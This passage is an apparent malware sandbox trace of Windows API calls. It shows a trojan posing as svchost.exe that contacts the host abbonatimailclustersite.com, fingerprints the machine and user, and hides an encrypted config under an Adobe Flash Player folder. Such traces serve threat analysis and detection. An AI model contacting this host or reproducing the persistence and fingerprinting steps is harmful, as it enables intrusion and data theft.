(hObject=0x1b8) returned 1 [0121.087] ReleaseMutex (hMutex=0x1f8) returned 1 [0121.118] CloseHandle (hObject=0x1f8) returned 1 [0121.119] SetLastError (dwErrCode=0x0) [0121.119] GetModuleHandleA (lpModuleName="crypt32.dll") returned 0x0 [0121.119] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x765f0000 [0121.231] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x725e871, cbEncoded=0x125, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x725e76c, pcbStructInfo=0x725e764 | out: pvStructInfo=0x725e76c, pcbStructInfo=0x725e764) returned 1 [0121.235] CryptImportPublicKeyInfo (in: hCryptProv=0x5205680, dwCertEncodingType=0x1, pInfo=0x5209100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x5209130*, PublicKey.cbData=0x10d, PublicKey.pbData=0x5209138*, PublicKey.cUnusedBits=0x0), phKey=0x725e768 | out: phKey=0x725e768*=0x521a230) returned 1 [0121.239] LocalFree (hMem=0x5209100) returned 0x0 [0121.240] wvnsprintfA (in: pszDest=0x54139e8, cchDest=21, pszFmt="%d", arglist=0x725e6b0 | out: pszDest="1476366203") returned 10 [0121.241] CryptEncrypt (in: hKey=0x521a230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x725e6f8*=0x20, dwBufLen=0x0 | out: pbData=0x0, pdwDataLen=0x725e6f8*=0x100) returned 1 [0121.242] CryptEncrypt (in: hKey=0x521a230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5401778*, pdwDataLen=0x725e70c*=0x20, dwBufLen=0x100 | out: pbData=0x5401778*, pdwDataLen=0x725e70c*=0x100) returned 1 [0121.243] CryptDestroyKey (hKey=0x521a230) returned 1 [0121.243] InternetCrackUrlA (in: lpszUrl="https://abbonatimailclustersite.com/1piozpaweoqyttitaryez.dat", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x725e708 | out: lpUrlComponents=0x725e708) returned 1 [0121.244] GetComputerNameW (in: lpBuffer=0x725e580, nSize=0x725e538 | out: lpBuffer="7ZA1P8WI", nSize=0x725e538) returned 1 [0121.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x725e4f4 | out: phkResult=0x725e4f4*=0x1f8) returned 0x0 [0121.244] RegQueryValueExW (in: hKey=0x1f8, lpValueName="InstallDate", lpReserved=0x0, lpType=0x725e514, lpData=0x725e518, lpcbData=0x725e50c*=0x4 | out: lpType=0x725e514*=0x4, lpData=0x725e518*=0x0, lpcbData=0x725e50c*=0x4) returned 0x0 [0121.244] RegCloseKey (hKey=0x1f8) returned 0x0 [0121.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x725e514 | out: phkResult=0x725e514*=0x1f8) returned 0x0 [0121.244] RegQueryValueExW (in: hKey=0x1f8, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x725e524*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x725e524*=0x0) returned 0x2 [0121.244] RegCloseKey (hKey=0x1f8) returned 0x0 [0121.245] GetVersionExW (in: lpVersionInformation=0x725e5fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x725e5fc*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x2800, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0121.245] wvnsprintfA (in: pszDest=0x5401390, cchDest=516, pszFmt="%s%s", arglist=0x725e740 | out: pszDest="https://abbonatimailclustersite.com/8aSSND1LNP/qlNPHlno85NZ/_/m/xs_/_/X/bV/g") returned 76 [0121.245] InternetCrackUrlA (in: lpszUrl="https://abbonatimailclustersite.com/8aSSND1LNP/qlNPHlno85NZ/_/m/xs_/_/X/bV/g", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x725e700 | out: lpUrlComponents=0x725e700) returned 1 [0121.245] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x0 [0121.246] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x73cc0000 [0121.471] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x4ed1990, cbSize=0x725e71c | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0x725e71c) returned 0x0 [0121.819] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0122.992] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x4ece014, dwBufferLength=0x4) returned 1 [0122.992] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x4ece01c, dwBufferLength=0x4) returned 1 [0122.993] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x4ece024, dwBufferLength=0x4) returned 1 [0126.734] InternetQueryOptionA (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x725e624, lpdwBufferLength=0x725e628 | out: lpBuffer=0x725e624, lpdwBufferLength=0x725e628) returned 1 [0126.734] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x725e624, dwBufferLength=0x4) returned 1 [0127.463] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0127.465] InternetQueryOptionA (in: hInternet=0xcc0008, dwOption=0x15, lpBuffer=0x725e734, lpdwBufferLength=0x725e738 | out: lpBuffer=0x725e734, lpdwBufferLength=0x725e738) returned 1 [0127.466] GetLastError () returned 0x0 [0127.466] GetLocalTime (in: lpSystemTime=0x725ecc0 | out: lpSystemTime=0x725ecc0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0x36d)) [0127.466] GetCurrentThreadId () returned 0xd6c [0127.466] GetCurrentProcessId () returned 0x2ec [0127.466] wvnsprintfW (in: pszDest=0x54010a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725ec64 | out: pszDest="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0127.466] wvnsprintfW (in: pszDest=0x540114c, cchDest=1962, pszFmt="Failed.", arglist=0x725ece0 | out: pszDest="Failed.") returned 7 [0127.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0127.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", cchWideChar=93, lpMultiByteStr=0x5403100, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", lpUsedDefaultChar=0x0) returned 93 [0127.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0127.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", cchWideChar=93, lpMultiByteStr=0x5403170, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001D, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: Failed.", lpUsedDefaultChar=0x0) returned 93 [0127.467] GetSystemTime (in: lpSystemTime=0x725e8b0 | out: lpSystemTime=0x725e8b0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0x36d)) [0127.467] SystemTimeToFileTime (in: lpSystemTime=0x725e8b0, lpFileTime=0x725e8a0 | out: lpFileTime=0x725e8a0) returned 1 [0127.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0127.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5458088, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0127.468] GetUserNameExW () returned 0x1 [0127.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0127.469] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5459168, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="8A") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="00") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="00") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="00") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="B7") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="49") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="67") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="98") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="F6") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="14") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="59") returned 2 [0127.469] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="35") returned 2 [0127.470] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="AA") returned 2 [0127.470] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="3E") returned 2 [0127.470] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="27") returned 2 [0127.470] wvnsprintfW (in: pszDest=0x725e698, cchDest=6, pszFmt="%02X", arglist=0x725e674 | out: pszDest="60") returned 2 [0127.470] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x2f0 [0127.470] WaitForSingleObject (hHandle=0x2f0, dwMilliseconds=0xffffffff) returned 0x0 [0127.470] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0127.470] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0127.470] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0127.470] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0127.470] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0127.471] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0127.471] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0127.471] GetCurrentThread () returned 0xfffffffe [0127.471] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e8fc | out: TokenHandle=0x725e8fc*=0x0) returned 0 [0127.471] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e8fc | out: TokenHandle=0x725e8fc*=0x2ec) returned 1 [0127.471] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e904 | out: lpLuid=0x725e904*(LowPart=0x8, HighPart=0)) returned 1 [0127.472] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725e900*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.472] GetLastError () returned 0x0 [0127.472] CloseHandle (hObject=0x2ec) returned 1 [0127.472] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.472] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5291910, lpbSaclPresent=0x725e934, pSacl=0x725e928, lpbSaclDefaulted=0x725e930 | out: lpbSaclPresent=0x725e934, pSacl=0x725e928, lpbSaclDefaulted=0x725e930) returned 1 [0127.472] SetNamedSecurityInfoW () returned 0x0 [0127.480] LocalFree (hMem=0x5291910) returned 0x0 [0127.480] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0127.480] GetCurrentThread () returned 0xfffffffe [0127.480] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x725e8fc | out: TokenHandle=0x725e8fc*=0x0) returned 0 [0127.480] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x725e8fc | out: TokenHandle=0x725e8fc*=0x2ec) returned 1 [0127.480] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x725e904 | out: lpLuid=0x725e904*(LowPart=0x8, HighPart=0)) returned 1 [0127.506] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x725e900*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0127.506] GetLastError () returned 0x0 [0127.506] CloseHandle (hObject=0x2ec) returned 1 [0127.506] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0127.506] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52917f0, lpbSaclPresent=0x725e934, pSacl=0x725e928, lpbSaclDefaulted=0x725e930 | out: lpbSaclPresent=0x725e934, pSacl=0x725e928, lpbSaclDefaulted=0x725e930) returned 1 [0127.506] SetNamedSecurityInfoW () returned 0x0 [0127.508] LocalFree (hMem=0x52917f0) returned 0x0 [0127.508] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0127.508] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x725e948 | out: lpFileSize=0x725e948*=4591) returned 1 [0127.508] VirtualAlloc (lpAddress=0x0, dwSize=0x11ef, flAllocationType=0x3000, flProtect=0x4) returned 0x7860000 [0127.508] ReadFile (in: hFile=0x2ec, lpBuffer=0x7860000, nNumberOfBytesToRead=0x11ef, lpNumberOfBytesRead=0x725e954, lpOverlapped=0x0 | out: lpBuffer=0x7860000*, lpNumberOfBytesRead=0x725e954*=0x11ef, lpOverlapped=0x0) returned 1 [0127.518] CloseHandle (hObject=0x2ec) returned 1 [0127.519] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366202") returned 10 [0127.519] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.520] wvnsprintfA (in: pszDest=0x5414188, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.521] wvnsprintfA (in: pszDest=0x5414148, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.522] wvnsprintfA (in: pszDest=0x54141a8, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.522] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.523] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.524] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366203") returned 10 [0127.524] wvnsprintfA (in: pszDest=0x5414188, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.525] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.526] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.527] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.528] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.529] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.529] wvnsprintfA (in: pszDest=0x54141a8, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366204") returned 10 [0127.531] wvnsprintfA (in: pszDest=0x5414128, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366205") returned 10 [0127.532] wvnsprintfA (in: pszDest=0x5414108, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366205") returned 10 [0127.533] wvnsprintfA (in: pszDest=0x5414048, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366205") returned 10 [0127.534] wvnsprintfA (in: pszDest=0x5414188, cchDest=21, pszFmt="%d", arglist=0x725e898 | out: pszDest="1476366209") returned 10 [0127.535] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0127.549] WriteFile (in: hFile=0x2ec, lpBuffer=0x5404c10*, nNumberOfBytesToWrite=0x12c8, lpNumberOfBytesWritten=0x725e94c, lpOverlapped=0x0 | out: lpBuffer=0x5404c10*, lpNumberOfBytesWritten=0x725e94c, lpOverlapped=0x0) returned 1 [0127.550] CloseHandle (hObject=0x2ec) returned 1 [0127.562] ReleaseMutex (hMutex=0x2f0) returned 1 [0127.562] CloseHandle (hObject=0x2f0) returned 1 [0127.562] SetLastError (dwErrCode=0x0) [0127.562] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x725f318 | out: phkResult=0x725f318*=0x2f0) returned 0x0 [0127.562] RegQueryValueExW (in: hKey=0x2f0, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x725f344, lpData=0x0, lpcbData=0x725f328*=0x0 | out: lpType=0x725f344*=0x0, lpData=0x0, lpcbData=0x725f328*=0x0) returned 0x2 [0127.562] RegCloseKey (hKey=0x2f0) returned 0x0 [0127.563] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0127.563] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x725f31c | out: lpFileSize=0x725f31c*=0) returned 1 [0127.563] CloseHandle (hObject=0x2f0) returned 1 [0127.563] GetLastError () returned 0x0 [0127.563] GetLastError () returned 0x0 [0127.563] GetLocalTime (in: lpSystemTime=0x725f328 | out: lpSystemTime=0x725f328*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0x3d9)) [0127.563] GetCurrentThreadId () returned 0xd6c [0127.563] GetCurrentProcessId () returned 0x2ec [0127.563] wvnsprintfW (in: pszDest=0x5403100, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x725f2cc | out: pszDest="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: ") returned 86 [0127.563] wvnsprintfW (in: pszDest=0x54031ac, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x725f34c | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0127.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0127.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x545a5d0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0127.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0127.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x545a1e0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:29] ver=2.2.5, log=0x001E, PID=0x02EC, TID=0x0D6C, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0127.564] GetSystemTime (in: lpSystemTime=0x725ef18 | out: lpSystemTime=0x725ef18*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x1d, wMilliseconds=0x3d9)) [0127.564] SystemTimeToFileTime (in: lpSystemTime=0x725ef18, lpFileTime=0x725ef08 | out: lpFileTime=0x725ef08) returned 1 [0127.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0127.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5458118, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0127.564] GetUserNameExW () returned 0x1 [0127.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0127.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5459168, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="8A") returned 2 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", arglist=0x725ecdc | out: pszDest="00") returned 2 [0127.565] wvnsprintfW (in: pszDest=0x725ed00, cchDest=6, pszFmt="%02X", 